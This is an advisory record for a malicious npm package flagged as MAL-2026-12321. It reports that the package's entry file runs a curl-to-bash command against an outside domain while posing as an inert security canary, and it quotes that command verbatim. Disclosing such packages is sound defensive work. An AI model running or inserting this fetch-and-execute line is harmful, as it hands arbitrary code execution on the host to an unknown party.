@mgor/fw-canary-20260725-394b024b @0.0.2
Vulnerability report · Last retrieved from osv.dev August 5, 2026 at 5:03 PM UTC
OSV ID
MAL-2026-12321
Ecosystem
npm
Summary
index.js, the package's declared main entry point, unconditionally executes curl fewafw.hydege.me | /bin/bash at top level. Any consumer that requires or imports this package fetches an unpinned, unverified shell script from a non-first-party domain and pipes it into bash, yielding arbitrary code execution on the installer's host. The package.json description and README self-label the package as an inert security-test canary with no install scripts and no functionality, directly contradicting the actual code behavior — a deceptive cover story.
Source: amazon-inspector (80e828a7ffd0138db85154b49b584df253be1e6509a0a4aa6475bfe317510f37)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.